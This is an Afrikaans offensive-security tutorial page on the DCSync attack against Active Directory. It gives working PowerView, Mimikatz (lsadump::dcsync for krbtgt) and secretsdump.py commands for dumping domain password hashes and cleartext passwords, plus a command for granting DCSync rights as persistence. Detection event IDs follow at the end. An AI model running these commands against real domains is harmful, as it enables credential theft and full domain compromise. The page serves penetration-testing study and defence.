Gebruik Trickest om maklik en outomatiese werksvloei te bou wat aangedryf word deur die wêreld se mees gevorderde gemeenskapsinstrumente. Kry Toegang Vandag:

DCSync

Die DCSync-toestemming impliseer dat hierdie toestemmings oor die domein self beskik word: DS-Replication-Get-Changes, Replicating Directory Changes All en Replicating Directory Changes In Filtered Set.

Belangrike Notas oor DCSync:

• Die DCSync-aanval boots die gedrag van 'n Domeinbeheerder na en vra ander Domeinbeheerders om inligting te repliseer deur die Directory Replication Service Remote Protocol (MS-DRSR) te gebruik. Omdat MS-DRSR 'n geldige en noodsaaklike funksie van Active Directory is, kan dit nie afgeskakel of gedeaktiveer word nie.

• Standaard het slegs die groepe Domain Admins, Enterprise Admins, Administrators, en Domain Controllers die vereiste voorregte.

• As enige rekeningwagwoorde met omkeerbare enkripsie gestoor word, is daar 'n opsie in Mimikatz beskikbaar om die wagwoord in die teksformaat terug te gee.

Enumerasie

Kyk wie hierdie toestemmings het deur powerview te gebruik:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Exploiteer Lokaal

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Exploiteer op afstand

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking

-just-dc genereer 3 lêers:

• een met die NTLM-hashes

• een met die Kerberos-sleutels

• een met die oop teks wagwoorde van die NTDS vir enige rekeninge wat ingestel is met omkeerbare versleuteling geaktiveer. Jy kan gebruikers met omkeerbare versleuteling kry met

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Volharding

As jy 'n domein-admin is, kan jy hierdie regte aan enige gebruiker toeken met behulp van powerview:

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose

Dan kan jy kontroleer of die gebruiker korrek toegewys is die 3 voorregte deur na hulle te soek in die uitset van (jy behoort die name van die voorregte binne die "ObjectType" veld te kan sien):

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}

Versagting

• Sekuriteitsgebeurtenis ID 4662 (Ouditbeleid vir voorwerp moet geaktiveer wees) - 'n Operasie is uitgevoer op 'n voorwerp

• Sekuriteitsgebeurtenis ID 5136 (Ouditbeleid vir voorwerp moet geaktiveer wees) - 'n Gidsdiensvoorwerp is gewysig

• Sekuriteitsgebeurtenis ID 4670 (Ouditbeleid vir voorwerp moet geaktiveer wees) - Toestemmings op 'n voorwerp is verander

• AD ACL-skandeerder - Skep en vergelyk skep verslae van ACL's. https://github.com/canix1/ADACLScanner

Verwysings

• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync

• https://yojimbosecurity.ninja/dcsync/

Gebruik Trickest om maklik te bou en outomatiseer werksvloei aangedryf deur die wêreld se mees gevorderde gemeenskapshulpmiddels. Kry Vandag Toegang: